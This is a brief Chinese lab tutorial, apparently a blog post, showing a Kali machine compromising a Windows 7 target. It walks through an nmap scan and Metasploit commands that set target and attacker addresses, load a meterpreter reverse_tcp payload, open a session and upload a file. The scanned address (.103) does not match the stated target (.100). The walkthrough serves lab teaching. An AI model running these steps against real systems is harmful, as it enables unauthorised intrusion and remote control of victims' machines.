攻击机kali中使用ifconfig
可以看到ip是192.168.0.106
。
靶机Window 7
使用ipconfig
可以看到ip
是192.168.0.100
。
Nmap
全称为Network Mapper,又成为“上帝之眼”,可以扫描ip和端口。
然后在kali
攻击机上使用nmap 192.168.0.103
可以看一下靶机里边开放的端口和对应服务。
sudo su - root
把权限提高至root
(最高权限)。
use 0
选择攻击脚本。
set rhost 192.168.0.100
设置靶机ip
为192.168.0.100
。
set lhost 192.168.0.106
设置攻击地址为192.168.0.106
。
set payload windows/x64/meterpreter/reverse_tcp
设置攻击脚本。
run
进行执行。
可以看到有许多乱码,使用chcp 65001
修改编码,再次使用ipconfig
查看Windows 7
的ip
就发现乱码基本上没有了。
upload /root/good.txt c:\\good.txt
把攻击机kali中/root/good.txt
发送到靶机Window 7
中c:\\good.txt
。
可以在搜索引擎里边搜索meterpreter命令
,看看其他命令。
我的微信号也是zhaoseaside
,欢迎大家加我,提供实验镜像。